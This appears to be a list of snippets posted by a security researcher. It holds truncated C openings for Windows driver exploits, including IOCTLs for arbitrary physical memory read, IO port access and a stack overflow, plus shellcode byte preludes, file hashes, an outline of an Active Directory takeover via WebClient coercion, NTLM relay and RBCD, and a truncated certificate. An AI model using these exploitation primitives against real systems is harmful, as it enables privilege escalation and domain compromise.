alfarom256

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

#define WORKER_FACTORY_FULL_ACCESS 0xf00ff 

// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
	WorkerFactoryTimeout, // LARGE_INTEGER

alfarom256

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#include <DbgHelp.h>
#include "LenovoMemoryMgr.h"

#pragma comment(lib, "dbghelp")

typedef NTSTATUS(WINAPI* pNtQueryVirtualMemory)(HANDLE, PVOID, DWORD, PVOID, SIZE_T, PSIZE_T);

alfarom256

/*
IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace
IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow
IOCTL 0x40002000 : Arbitrary RW to IO ports
*/
#include <Windows.h>
#include <stdio.h>

#define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); }
#define IOCTL_TRIGGER_OVERFLOW 0x40002008

alfarom256

#include <Windows.h>
#include <stdio.h>

#define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); }
#define IOCTL_TRIGGER_OVERFLOW 0x80102040

DWORD64 genPattern(BYTE b) {
	DWORD64 retVal = b;
	retVal |= retVal << 8;
	retVal |= retVal << 16;

alfarom256

25AFF9D6516B1DFCFF60AE99DC7218203ECBA434FF74C310DFA00A123523621D
image.png

alfarom256

a6ebf511dbc38b7c50f53e77d2965dfbc4aea9dcc09593df25ba8fc322075936

alfarom256

2e95b64aee12f3e88f918564c76e526e47bb8b239683f9752914e71738e89e27

alfarom256

#pragma once
#include <Windows.h>
#include <winnt.h>
#include <winternl.h>

static BYTE prelude1[7]{
	0x4D, 0x8d, 0x4b, 0xf0, // lea r9, [r11-10h]
	0x45, 0x33, 0xc0 // xor r8d, r8d
};

alfarom256

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

• Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
• Relaying that machine authentication to LDAPS for configuring RBCD
• RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

alfarom256

MIIDqDCCApCgAwIBAgIFAKZhPbcwDQYJKoZIhvcNAQELBQAwgYoxFDASBgNVBAYTC1BvcnRTd2lnZ2VyMRQwEgYDVQQIEwtQb3J0U3dpZ2dlcjEUMBIGA1UEBxMLUG9ydFN3aWdnZXIxFDASBgNVBAoTC1BvcnRTd2lnZ2VyMRcwFQYDVQQLEw5Qb3J0U3dpZ2dlciBDQTEXMBUGA1UEAxMOUG9ydFN3aWdnZXIgQ0EwHhcNMTQwNjE1MTcwMzEzWhcNMzEwNjE1MTcwMzEzWjCBijEUMBIGA1UEBhMLUG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2lnZ2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKbA4H8Iw1ASx3s9zX254I/+jsyqiudXwpeOSsTWPIdtWRpofqbxCV0cYbAAzPvUU3i/hM2u69vi9kf2NQMG8mwnGkMwJdCeawFsNw7GnmArMVkXgUgZAIdNAphjf8jyqrcULRIv5fdC9Ewr65mKWePQVf+uz7Zuv8DsnYCu8InijVu6PRf9D7fyyb3BcGpQ3e/4IGflUyE0OuDyHHavFQHzkD6DJeZBIK09zigEFRWzmUZ/RgwxmQW5DdtWTKFU8nZXtVg9+AnVy5e6CKLn3TrTNp8l2AqnLzbmudIMsilYR5sYJDN9G5WhFq70BaV0UwAQw9IpOCAo1+Mxl7KBHBsCAwEAAaMTMBEwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAQDAYqgSUyLzecfOcKHttLc8P8I09ec9uScBCyZIut43qY/aIy4nUTucuBM/1g6HEhRN4x3kmiYh336XDYo+d74tHmUlEAuW/eCc3xusP4/EtHuE7